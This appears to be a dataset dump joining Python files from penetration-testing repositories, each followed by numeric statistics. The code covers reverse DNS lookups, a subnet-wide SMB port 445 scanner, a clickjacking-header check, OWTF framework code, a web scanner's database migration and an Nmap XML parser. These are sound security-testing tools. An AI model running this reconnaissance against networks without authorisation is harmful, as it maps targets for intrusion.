log_path = 'pst_indexer.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
logging.info('Starting PST_Indexer v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
logging.info('Starting Script...')
main(args.PST_FILE, args.title)
logging.info('Script Complete')
| 33.761905 | 107 | 0.64011 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def child_method():
print("This is child method()")
| 8.222222 | 32 | 0.609756 |
PenTestScripts | #!/usr/bin/python
# Quick script that attempts to find the reverse DNS info
# from a provided IP range.
import argparse
import os
import socket
import sys
from netaddr import IPNetwork
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSReverser takes IP addresses and tries to find its hostname.")
parser.add_argument(
"-f", metavar="ips.txt", default=None,
help="File containing IPs to resolve hostnames for.")
parser.add_argument(
"-ip", metavar='192.168.1.1', default=None,
help="Used to find hostname about a specific IP.")
parser.add_argument(
"-cidr", metavar='192.168.1.0/24', default=None,
help="Used to find hostnames about a specific CIDR range.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.f, args.ip, args.cidr
def rdns_lookup(ip_address):
try:
# Get the reverse dns name if it exists
reverse_dns = socket.gethostbyaddr(ip_address)[0]
script_out = ip_address.strip() + ' ' + reverse_dns + '\n'
with open('reverse_dns_results.txt', 'a') as rev_results:
rev_results.write(script_out)
except:
print "No Reverse DNS for " + str(ip_address) + "."
return
def cidr_net(cidr_range):
net_1 = IPNetwork(cidr_range)
return net_1
def file_read(input_file):
with open(input_file, 'r') as f:
ip_file = f.readlines()
return ip_file
def title():
# Clear the screen
os.system('clear')
print "############################################################"
print "# Reverse DNS Scanner #"
print "############################################################\n"
print "Starting Reverse DNS Scan...\n"
return
if __name__ == '__main__':
# Parse command line options
cli_file, cli_ip, cli_cidr = cli_parser()
title()
if cli_cidr is not None and cli_file is None and cli_ip is None:
ip_cidr_list = cidr_net(cli_cidr)
for ip_add in ip_cidr_list:
ip_add = str(ip_add)
ip_add = ip_add.strip()
rdns_lookup(ip_add)
elif cli_file is not None and cli_cidr is None and cli_ip is None:
ip_file_input = file_read(cli_file)
for ip_add_file in ip_file_input:
ip_add_file = ip_add_file.strip()
rdns_lookup(ip_add_file)
elif cli_ip is not None and cli_cidr is None and cli_file is None:
rdns_lookup(cli_ip)
else:
print "[*]ERROR: Please start over and provide a valid input option."
sys.exit()
print "\nScan Completed! Check the output file!\n"
| 25.981308 | 85 | 0.572765 |
Hands-On-Penetration-Testing-with-Python | import requests
class Detect_CJ():
def __init__(self,target):
self.target=target
def start(self):
try:
resp=requests.get(self.target)
headers=resp.headers
print ("\n\nHeaders set are : \n" )
for k,v in headers.iteritems():
print(k+":"+v)
if "X-Frame-Options" in headers.keys():
print("\n\nClick Jacking Header present")
else:
print("\n\nX-Frame-Options is missing ! ")
except Exception as ex:
print("EXception caught : " +str(ex))
obj=Detect_CJ("http://192.168.250.1/dvwa")
obj.start()
| 18.814815 | 46 | 0.642322 |
cybersecurity-penetration-testing | import socket
def get_protnumber(prefix):
return dict( (getattr(socket, a), a)
for a in dir(socket)
if a.startswith(prefix))
proto_fam = get_protnumber('AF_')
types = get_protnumber('SOCK_')
protocols = get_protnumber('IPPROTO_')
for res in socket.getaddrinfo('www.thapar.edu', 'http'):
family, socktype, proto, canonname, sockaddr = res
print 'Family :', proto_fam[family]
print 'Type :', types[socktype]
print 'Protocol :', protocols[proto]
print 'Canonical name:', canonname
print 'Socket address:', sockaddr
| 26.7 | 56 | 0.676311 |
cybersecurity-penetration-testing | import threading
import time
import socket, subprocess,sys
import thread
import collections
from datetime import datetime
'''section 1'''
net = raw_input("Enter the Network Address ")
st1 = int(raw_input("Enter the starting Number "))
en1 = int(raw_input("Enter the last Number "))
en1=en1+1
#dic = collections.OrderedDict()
list1= []
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def scan(addr):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((addr,445))
if result==0:
sock.close()
return 1
else :
sock.close()
def run1(st1,en1):
for ip in xrange(st1,en1):
addr = net2+str(ip)
if scan(addr):
list1.append(addr)
'''section 4'''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
#print "i is ",i
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
list1.sort()
for k in list1 :
print k,"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.014085 | 60 | 0.671575 |
cybersecurity-penetration-testing | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
print" <Entity Type=\"maltego."+entity+"\">"
print" <Value>"+value+"</Value>"
print" <AdditionalFields>"
for value, item in addvalues.iteritems():
print" <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
print" </AdditionalFields>"
print" </Entity>"
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
| 24.347826 | 104 | 0.671821 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Cookie Attributes Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCookiesAttributes")
Content = plugin_helper.resource_linklist(
"Online Hash Cracking Resources", resource
)
return Content
| 27.153846 | 65 | 0.761644 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.addParameter_field'
db.add_column(u'xtreme_server_project', 'addParameter_field',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
# Adding field 'Project.addParameter'
db.add_column(u'xtreme_server_project', 'addParameter',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.addParameter_field'
db.delete_column(u'xtreme_server_project', 'addParameter_field')
# Deleting field 'Project.addParameter'
db.delete_column(u'xtreme_server_project', 'addParameter')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'addParameter': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'addParameter_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.008621 | 130 | 0.541512 |
owtf | """
owtf.core
~~~~~~~~~
This is the command-line front-end in charge of processing arguments and call the framework.
"""
from __future__ import print_function
from copy import deepcopy
import logging
import os
import signal
import sys
from tornado.ioloop import IOLoop, PeriodicCallback
from owtf import __version__
from owtf.api.main import start_server
from owtf.config import config_handler
from owtf.files.main import start_file_server
from owtf.lib import exceptions
from owtf.lib.cli_options import parse_options, usage
from owtf.managers.config import load_framework_config, load_general_config
from owtf.managers.plugin import (
get_types_for_plugin_group,
load_plugins,
load_test_groups,
)
from owtf.managers.resource import load_resources_from_file
from owtf.managers.session import _ensure_default_session
from owtf.managers.target import load_targets
from owtf.managers.worklist import load_works
from owtf.models.plugin import Plugin
from owtf.plugin.runner import show_plugin_list
from owtf.proxy.main import start_proxy
from owtf.settings import (
AUX_TEST_GROUPS,
DEFAULT_FRAMEWORK_CONFIG,
DEFAULT_GENERAL_PROFILE,
DEFAULT_RESOURCES_PROFILE,
FALLBACK_AUX_TEST_GROUPS,
FALLBACK_FRAMEWORK_CONFIG,
FALLBACK_GENERAL_PROFILE,
FALLBACK_NET_TEST_GROUPS,
FALLBACK_RESOURCES_PROFILE,
FALLBACK_WEB_TEST_GROUPS,
NET_TEST_GROUPS,
WEB_TEST_GROUPS,
)
from owtf.transactions.main import start_transaction_logger
from owtf.utils.file import clean_temp_storage_dirs, create_temp_storage_dirs
from owtf.utils.process import _signal_process
from owtf.utils.signals import workers_finish, owtf_start
__all__ = ["finish", "main"]
# Store parent PID for clean exit
owtf_pid = None
# Get a global DB connection instance
from owtf.db.session import get_scoped_session
db = get_scoped_session()
def print_banner():
"""
Print the application banner.
"""
print(
"""\033[92m
_____ _ _ _ _____ _____
| | | | |_ _| __|
| | | | | | | | | __|
|_____|_____| |_| |__|
@owtfp
http://owtf.org
Version: {0}
\033[0m""".format(
__version__
)
)
def get_plugins_from_arg(arg):
""" Returns a list of requested plugins and plugin groups
:param arg: Comma separated list of plugins
:type arg: `str`
:return: List of plugins and plugin groups
:rtype: `list`
"""
plugins = arg.split(",")
plugin_groups = Plugin.get_groups_for_plugins(db, plugins)
if len(plugin_groups) > 1:
usage(
"The plugins specified belong to several plugin groups: '%s'".format(
str(plugin_groups)
)
)
return [plugins, plugin_groups]
def process_options(user_args):
""" The main argument processing function
:param user_args: User supplied arguments
:type user_args: `dict`
:return: A dictionary of arguments
:rtype: `dict`
"""
arg = None
try:
valid_groups = Plugin.get_all_plugin_groups(db)
valid_types = Plugin.get_all_plugin_types(db) + ["all", "quiet"]
arg = parse_options(user_args, valid_groups, valid_types)
except KeyboardInterrupt as e:
usage("Invalid OWTF option(s) {}".format(e))
sys.exit(0)
except SystemExit:
# --help triggers the SystemExit exception, catch it and exit
finish()
if arg:
# Default settings:
plugin_group = arg.plugin_group
if arg.only_plugins:
arg.only_plugins, plugin_groups = get_plugins_from_arg(arg.only_plugins)
try:
# Set Plugin Group according to plugin list specified
plugin_group = plugin_groups[0]
except IndexError:
usage("Please use either OWASP/OWTF codes or Plugin names")
logging.info(
"Defaulting plugin group to '%s' based on list of plugins supplied",
plugin_group,
)
if arg.except_plugins:
arg.except_plugins, plugin_groups = get_plugins_from_arg(arg.except_plugins)
if arg.tor_mode:
arg.tor_mode = arg.tor_mode.split(":")
if arg.tor_mode[0] == "help":
from owtf.proxy.tor_manager import TOR_manager
TOR_manager.msg_configure_tor()
exit(0)
if len(arg.tor_mode) == 1:
if arg.tor_mode[0] != "help":
usage("Invalid argument for TOR-mode")
elif len(arg.tor_mode) != 5:
usage("Invalid argument for TOR-mode")
else:
# Enables outbound_proxy.
if arg.tor_mode[0] == "":
outbound_proxy_ip = "127.0.0.1"
else:
outbound_proxy_ip = arg.tor_mode[0]
if arg.tor_mode[1] == "":
outbound_proxy_port = "9050" # default TOR port
else:
outbound_proxy_port = arg.tor_mode[1]
arg.outbound_proxy = "socks://{0}:{1}".format(
outbound_proxy_ip, outbound_proxy_port
)
if arg.outbound_proxy:
arg.outbound_proxy = arg.outbound_proxy.split("://")
if len(arg.outbound_proxy) == 2:
arg.outbound_proxy = arg.outbound_proxy + arg.outbound_proxy.pop().split(
":"
)
if arg.outbound_proxy[0] not in ["socks", "http"]:
usage("Invalid argument for outbound proxy")
else:
arg.outbound_proxy = arg.outbound_proxy.pop().split(":")
# outbound_proxy should be type://ip:port
if len(arg.outbound_proxy) not in [2, 3]:
usage("Invalid argument for outbound proxy")
else: # Check if the port is an int.
try:
int(arg.outbound_proxy[-1])
except ValueError:
usage("Invalid port provided for Outbound Proxy")
if arg.inbound_proxy:
arg.inbound_proxy = arg.inbound_proxy.split(":")
# inbound_proxy should be (ip:)port:
if len(arg.inbound_proxy) not in [1, 2]:
usage("Invalid argument for Inbound Proxy")
else:
try:
int(arg.inbound_proxy[-1])
except ValueError:
usage("Invalid port for Inbound Proxy")
plugin_types_for_group = get_types_for_plugin_group(db, plugin_group)
if arg.plugin_type == "all":
arg.plugin_type = plugin_types_for_group
elif arg.plugin_type == "quiet":
arg.plugin_type = ["passive", "semi_passive"]
scope = arg.targets or [] # Arguments at the end are the URL target(s)
num_targets = len(scope)
if plugin_group != "auxiliary" and num_targets == 0 and not arg.list_plugins:
if arg.nowebui:
finish()
elif num_targets == 1: # Check if this is a file
if os.path.isfile(scope[0]):
logging.info("Scope file: trying to load targets from it ..")
new_scope = []
for target in open(scope[0]).read().split("\n"):
clean_target = target.strip()
if not clean_target:
continue # Skip blank lines
new_scope.append(clean_target)
if len(new_scope) == 0: # Bad file
usage("Please provide a scope file (1 target x line)")
scope = new_scope
for target in scope:
if target[0] == "-":
usage("Invalid Target: {}".format(target))
args = ""
if plugin_group == "auxiliary":
# For auxiliary plugins, the scope are the parameters.
args = scope
# auxiliary plugins do not have targets, they have metasploit-like parameters.
scope = ["auxiliary"]
return {
"list_plugins": arg.list_plugins,
"force_overwrite": arg.force_overwrite,
"interactive": arg.interactive == "yes",
"scope": scope,
"argv": sys.argv,
"plugin_type": arg.plugin_type,
"only_plugins": arg.only_plugins,
"except_plugins": arg.except_plugins,
"inbound_proxy": arg.inbound_proxy,
"outbound_proxy": arg.outbound_proxy,
"outbound_proxy_auth": arg.outbound_proxy_auth,
"plugin_group": plugin_group,
"rport": arg.rport,
"port_waves": arg.port_waves,
"proxy_mode": arg.proxy_mode,
"tor_mode": arg.tor_mode,
"nowebui": arg.nowebui,
"args": args,
}
return {}
def initialise_framework(options):
"""This function initializes the entire framework
:param options: Additional arguments for the component initializer
:type options: `dict`
:return: True if all commands do not fail
:rtype: `bool`
"""
logging.info("Loading framework please wait..")
# No processing required, just list available modules.
if options["list_plugins"]:
show_plugin_list(db, options["list_plugins"])
finish()
target_urls = load_targets(session=db, options=options)
load_works(session=db, target_urls=target_urls, options=options)
start_proxy()
start_transaction_logger()
return True
def poll_workers():
from owtf.managers.worker import worker_manager
callback = PeriodicCallback(worker_manager.manage_workers, 2000)
try:
callback.start()
IOLoop.instance().start()
except SystemExit as e:
callback.stop()
def init(args):
"""Start OWTF.
:params dict args: Options from the CLI.
"""
if initialise_framework(args):
if not args["nowebui"]:
start_server()
start_file_server()
poll_workers()
@workers_finish.connect
def finish(sender=None, **kwargs):
if sender:
logging.debug("[{}]: sent the signal".format(sender))
global owtf_pid
_signal_process(pid=owtf_pid, psignal=signal.SIGINT)
def main():
""" The main wrapper which loads everything
:return:
:rtype: None
"""
args = sys.argv
print_banner()
# Get tool path from script path:
root_dir = os.path.dirname(os.path.abspath(args[0])) or "."
global owtf_pid
owtf_pid = os.getpid()
# Bootstrap the DB
create_temp_storage_dirs(owtf_pid)
try:
_ensure_default_session(db)
load_framework_config(
DEFAULT_FRAMEWORK_CONFIG, FALLBACK_FRAMEWORK_CONFIG, root_dir, owtf_pid
)
load_general_config(db, DEFAULT_GENERAL_PROFILE, FALLBACK_GENERAL_PROFILE)
load_resources_from_file(
db, DEFAULT_RESOURCES_PROFILE, FALLBACK_RESOURCES_PROFILE
)
load_test_groups(db, WEB_TEST_GROUPS, FALLBACK_WEB_TEST_GROUPS, "web")
load_test_groups(db, NET_TEST_GROUPS, FALLBACK_NET_TEST_GROUPS, "net")
load_test_groups(db, AUX_TEST_GROUPS, FALLBACK_AUX_TEST_GROUPS, "aux")
# After loading the test groups then load the plugins, because of many-to-one relationship
load_plugins(db)
except exceptions.DatabaseNotRunningException:
sys.exit(-1)
args = process_options(args[1:])
config_handler.cli_options = deepcopy(args)
# Patch args by sending the OWTF start signal
owtf_start.send(__name__, args=args)
# Initialise Framework.
try:
if init(args):
# Only if Start is for real (i.e. not just listing plugins, etc)
finish() # Not Interrupted or Crashed.
except KeyboardInterrupt:
# NOTE: The user chose to interact: interactivity check redundant here:
logging.warning("OWTF was aborted by the user")
logging.info("Please check report/plugin output files for partial results")
# Interrupted. Must save the DB to disk, finish report, etc.
finish()
except SystemExit:
pass # Report already saved, framework tries to exit.
finally: # Needed to rename the temp storage dirs to avoid confusion.
clean_temp_storage_dirs(owtf_pid)
| 33.255556 | 98 | 0.589166 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import sys
import os
import glob
def main(argv):
if len(argv) == 1:
print('Usage: ./script <ext>')
return False
ext = argv[1]
system32 = set()
syswow64 = set()
p1 = os.path.join(os.environ['Windir'], 'System32' + os.sep + '*.' + ext)
p2 = os.path.join(os.environ['Windir'], 'SysWOW64' + os.sep + '*.' + ext)
sys.stderr.write('[.] System32: ' + p1 + '\n')
sys.stderr.write('[.] SysWOW64: ' + p2 + '\n')
for file in glob.glob(p1):
system32.add(os.path.basename(file))
for file in glob.glob(p2):
syswow64.add(os.path.basename(file))
commons = system32.intersection(syswow64)
sys.stderr.write(f"[.] Found {len(system32)} files in System32\n")
sys.stderr.write(f"[.] Found {len(syswow64)} files in SysWOW64\n")
sys.stderr.write(f"[.] Intersection of these two sets: {len(commons)}\n")
for f in commons:
print(f)
if __name__ == '__main__':
main(sys.argv) | 26.25 | 77 | 0.585714 |
PenTestScripts | #!/usr/bin/env python
import httplib2
from BeautifulSoup import BeautifulSoup, SoupStrainer
http = httplib2.Http()
status, response = http.request('http://www.christophertruncer.com')
for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')):
if link.has_key('href'):
print link['href']
| 25.25 | 70 | 0.738854 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: An script that can process and parse NMAP XMLs
Returnable Data: A dictionary of hosts{iterated number} = [[hostnames], address, protocol, port, service name]
Name: nmap_parser.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import xml.etree.ElementTree as etree
import argparse
import collections
try:
import nmap_doc_generator as gen
except Exception as e:
print(e)
sys.exit("[!] Please download the nmap_doc_generator.py script")
class Nmap_parser:
def __init__(self, nmap_xml, verbose=0):
self.nmap_xml = nmap_xml
self.verbose = verbose
self.hosts = {}
try:
self.run()
except Exception, e:
print("[!] There was an error %s") % (str(e))
sys.exit(1)
def run(self):
# Parse the nmap xml file and extract hosts and place them in a dictionary
# Input: Nmap XML file and verbose flag
# Return: Dictionary of hosts [iterated number] = [hostname, address, protocol, port, service name, state]
if not self.nmap_xml:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
try:
tree = etree.parse(self.nmap_xml)
except:
sys.exit("[!] Cannot open Nmap XML file: %s \n[-] Ensure that your are passing the correct file and format" % (self.nmap_xml))
hosts={}
services=[]
hostname_list=[]
root = tree.getroot()
hostname_node = None
if self.verbose > 0:
print ("[*] Parsing the Nmap XML file: %s") % (self.nmap_xml)
for host in root.iter('host'):
hostname = "Unknown hostname"
for addresses in host.iter('address'):
hwaddress = "No MAC Address ID'd"
ipv4 = "No IPv4 Address ID'd"
addressv6 = "No IPv6 Address ID'd"
temp = addresses.get('addrtype')
if "mac" in temp:
hwaddress = addresses.get('addr')
if self.verbose > 2:
print("[*] The host was on the same broadcast domain")
if "ipv4" in temp:
address = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv4 address")
if "ipv6" in temp:
addressv6 = addresses.get('addr')
if self.verbose > 2:
print("[*] The host had an IPv6 address")
try:
hostname_node = host.find('hostnames').find('hostname')
except:
if self.verbose > 1:
print ("[!] No hostname found")
if hostname_node is not None:
hostname = hostname_node.get('name')
else:
hostname = "Unknown hostname"
if self.verbose > 1:
print("[*] The hosts hostname is %s") % (str(hostname_node))
hostname_list.append(hostname)
for item in host.iter('port'):
state = item.find('state').get('state')
#if state.lower() == 'open':
service = item.find('service').get('name')
protocol = item.get('protocol')
port = item.get('portid')
services.append([hostname_list, address, protocol, port, service, hwaddress, state])
hostname_list=[]
for i in range(0, len(services)):
service = services[i]
index = len(service) - 1
hostname = str1 = ''.join(service[0])
address = service[1]
protocol = service[2]
port = service[3]
serv_name = service[4]
hwaddress = service[5]
state = service[6]
self.hosts[i] = [hostname, address, protocol, port, serv_name, hwaddress, state]
if self.verbose > 2:
print ("[+] Adding %s with an IP of %s:%s with the service %s")%(hostname,address,port,serv_name)
if self.hosts:
if self.verbose > 4:
print ("[*] Results from NMAP XML import: ")
for key, entry in self.hosts.iteritems():
print("[*] %s") % (str(entry))
if self.verbose > 0:
print ("[+] Parsed and imported unique ports %s") % (str(i+1))
else:
if self.verbose > 0:
print ("[-] No ports were discovered in the NMAP XML file")
def hosts_return(self):
# A controlled return method
# Input: None
# Returned: The processed hosts
try:
return self.hosts
except Exception as e:
print("[!] There was an error returning the data %s") % (e)
if __name__ == '__main__':
# If script is executed at the CLI
usage = '''usage: %(prog)s [-x reports.xml] [-f xml_output2.xlsx] -s -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-x", "--xml", type=str, help="Generate a dictionary of data based on a NMAP XML import, more than one file may be passed, separated by a comma", action="store", dest="xml")
parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
parser.add_argument("-s", "--simple", action="store_true", dest="simple", help="Format the output into a simple excel product, instead of a report")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.43b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
# Set Constructors
xml = args.xml # nmap XML
if not xml:
sys.exit("[!] No XML file provided")
verbose = args.verbose # Verbosity level
filename = args.filename # Filename to output XLSX
simple = args.simple # Sets the colors for the excel spreadsheet output
xml_list=[] # List to hold XMLs
# Set return holder
hosts=[] # List to hold instances
hosts_temp={} # Temporary dictionary, which holds returned data from specific instances
hosts_dict={} # Dictionary, which holds the combined returned dictionaries
processed_hosts={} # The dictionary, which holds the unique values from all processed XMLs
count = 0 # Count for combining dictionaries
unique = set()
# Instantiation for proof of concept
if "," in xml:
xml_list = xml.split(',')
else:
xml_list.append(xml)
for x in xml_list:
try:
tree_temp = etree.parse(x)
except:
sys.exit("[!] Cannot open XML file: %s \n[-] Ensure that your are passing the correct file and format" % (x))
try:
root = tree_temp.getroot()
name = root.get("scanner")
if name is not None and "nmap" in name:
if verbose > 1:
print ("[*] File being processed is an NMAP XML")
hosts.append(Nmap_parser(x, verbose))
else:
print("[!] File % is not an NMAP XML") % (str(x))
sys.exit(1)
except Exception, e:
print("[!] Processing of file %s failed %s") % (str(x), str(e))
sys.exit(1)
# Processing of each instance returned to create a composite dictionary
if not hosts:
sys.exit("[!] There was an issue processing the data")
for inst in hosts:
hosts_temp = inst.hosts_return()
if hosts_temp is not None:
for k, v in hosts_temp.iteritems():
hosts_dict[count] = v
count+=1
hosts_temp.clear()
if verbose > 3:
for key, value in hosts_dict.iteritems():
print("[*] Key: %s Value: %s") % (key,value)
temp = [(k, hosts_dict[k]) for k in hosts_dict]
temp.sort()
key = 0
for k, v in temp:
compare = lambda x, y: collections.Counter(x) == collections.Counter(y)
if str(v) in str(processed_hosts.values()):
continue
else:
key+=1
processed_hosts[key] = v
# Generator for XLSX documents
gen.Nmap_doc_generator(verbose, processed_hosts, filename, simple)
# Printout of dictionary values
#if verbose > 0:
# for key, target in processed_hosts.iteritems():
# print("[*] Hostname: %s IP: %s Protocol: %s Port: %s Service: %s State: %s MAC address: %s" % (target[0],target[1],target[2],target[3],target[4],target[6],target[5]))
| 44.607759 | 197 | 0.583743 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 22:29
from __future__ import unicode_literals
